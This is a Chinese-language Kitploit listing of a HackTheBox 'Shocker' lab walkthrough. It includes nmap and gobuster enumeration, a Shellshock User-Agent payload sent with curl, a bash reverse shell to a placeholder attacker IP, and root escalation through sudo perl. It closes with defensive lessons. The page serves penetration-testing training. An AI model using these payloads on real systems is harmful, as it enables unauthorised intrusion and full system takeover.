Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Shocker-TJNULL-OSCP- — 结构化的HTB演练,演示通过CGI目录模糊测试利用Shellshock(CVE-2014-6271)漏洞,以及通过利用GTFOBins滥用配置错误的sudo Perl权限进行权限提升。 | Kitploit
工具/GitHubGitHub/r3fr4kt/shocker-tjnull-oscp-
权限提升侦察漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用渗透测试学习与教育实验室与实践
GitHubr3fr4kt/shocker-tjnull-oscp-

Shocker-TJNULL-OSCP-

结构化的HTB演练,演示通过CGI目录模糊测试利用Shellshock(CVE-2014-6271)漏洞,以及通过利用GTFOBins滥用配置错误的sudo Perl权限进行权限提升。

2个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

HackTheBox: Shocker 攻击报告

一份结构化的专业演练,展示了对严重Shellshock漏洞的识别和手动利用,随后通过Linux目标上配置错误的sudo权限进行本地权限提升。


技术概述

  • 目标操作系统: Linux
  • IP地址: 10.10.10.56
  • 难度: 简单
  • 核心漏洞: Shellshock (CVE-2014-6271) 及配置错误的Sudo权限 (/usr/bin/perl)
  • 目标: 通过CGI环境变量注入获得初始用户访问权限并提升至root。

1. 枚举与侦察

评估从一次快速的全端口TCP SYN扫描开始,仅针对开放端口(--open),同时绕过主机发现(-Pn)和DNS解析(-n),以加速信息收集。

root@kitploit:~
nmap -Pn -n -p- -sS --min-rate 5000 --open 10.10.10.56

目标服务与漏洞分析

初始扫描发现两个活跃服务。我们进行第二次定向扫描,执行主动版本检测(-sCV)和基于脚本的漏洞评估:

root@kitploit:~
nmap -sCV -p80,2222 --script="safe and vuln" 10.10.10.56

扫描结果

  • 端口80: HTTP (Apache Web服务器)
  • 端口2222: SSH (非标准端口)

2. 目录模糊测试与Web枚举

在漏洞扫描的同时,我们使用gobuster启动web目录暴力破解,以映射Apache服务器上的隐藏资源。我们使用来自SecLists框架的标准字典:

root@kitploit:~
gobuster dir -u [http://10.10.10.56/](http://10.10.10.56/) -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 20

关键发现

模糊测试过程识别出一个未索引的**/cgi-bin/**目录。在传统web部署中,Apache服务器利用通用网关接口(CGI)执行服务器端脚本。鉴于该机器名称和此文件夹的存在,我们积极寻找可能容易受到环境变量注入缺陷影响的可执行脚本(例如.sh、.cgi)。

进一步枚举发现一个名为user.sh的脚本位于/cgi-bin/目录内。


3. 武器化与初始立足点

测试Shellshock (PoC)

**Shellshock (CVE-2014-6271)**漏洞允许攻击者通过在处理易受攻击的Bash实例的HTTP请求头(例如User-Agent)中注入恶意函数定义来执行任意操作系统命令。

我们精心构造一个自定义的curl命令,发送一个概念验证(PoC)载荷,旨在强制远程系统执行/usr/bin/id命令:

root@kitploit:~
curl -H "User-Agent: () { :; }; echo; /usr/bin/id" [http://10.10.10.56/cgi-bin/user.sh](http://10.10.10.56/cgi-bin/user.sh)

  • 结果: Web服务器响应了id命令的输出,验证了类似认证的未认证远程代码执行(RCE)。

建立反向Shell

为了将我们的执行向量升级为交互式会话,我们在攻击平台上建立本地Netcat监听器:

root@kitploit:~
nc -lvnp 4444

接下来,我们在恶意的User-Agent头中注入原生的Bash反向Shell字符串,强制通过TCP回调:

root@kitploit:~
curl -H "User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp/<YOUR_TUN0_IP>/4444 0>&1" [http://10.10.10.56/cgi-bin/user.sh](http://10.10.10.56/cgi-bin/user.sh)

成功执行后,我们获得一个稳定的低权限Shell:

root@kitploit:~
$ whoami
shelly


4. 本地权限提升 (LPE)

在系统上获得一个用户上下文后,我们审计本地限制。我们查询sudo配置,确定shelly用户是否被授权无需提供密码即可执行提升权限的命令:

root@kitploit:~
sudo -l

Sudo配置审计

输出显示以下高风险条目:

root@kitploit:~
User shelly may run the following commands on shocker:
    (root) NOPASSWD: /usr/bin/perl

通过GTFOBins利用Perl

由于我们拥有不受限制、未经身份验证的访问权限,可以以root身份执行**perl二进制文件,因此我们可以轻松突破二进制限制。交叉引用GTFOBins**,我们找到一个执行包装器,指示Perl进入原生系统Shell(/bin/sh)并保留执行身份上下文(root):

root@kitploit:~
sudo -u root perl -e 'exec "/bin/sh"'

我们立即获得完全的管理执行上下文:

root@kitploit:~
# whoami
root


5. 后渗透与战利品

现在我们已经获得了root访问权限,我们导航到相关的家目录以检索攻破证明。

root@kitploit:~
# Access User Flag
cat /home/shelly/user.txt

# Access Root Flag
cat /root/root.txt


关键教训与防御建议

  1. 修补固有易受攻击的软件: Shellshock是GNU Bash中一个遗留的灾难性漏洞。确保所有服务器组件为基础实用程序接收主动安全补丁。
  2. 保护CGI环境: 如果必须保留CGI脚本,确保它们在隔离的沙盒执行模型(例如使用专门的容器运行时或chroot环境)下运行,并避免使用过时、易受攻击的默认Shell。
  3. 严格执行最小权限原则: 允许标准用户通过sudo无限制地执行强大的内置解释器(如perl、python或bash)会引入即刻的提权向量。Sudo访问应限于非交互式、高度受控的管理脚本。
root@kitploit:~
下载工具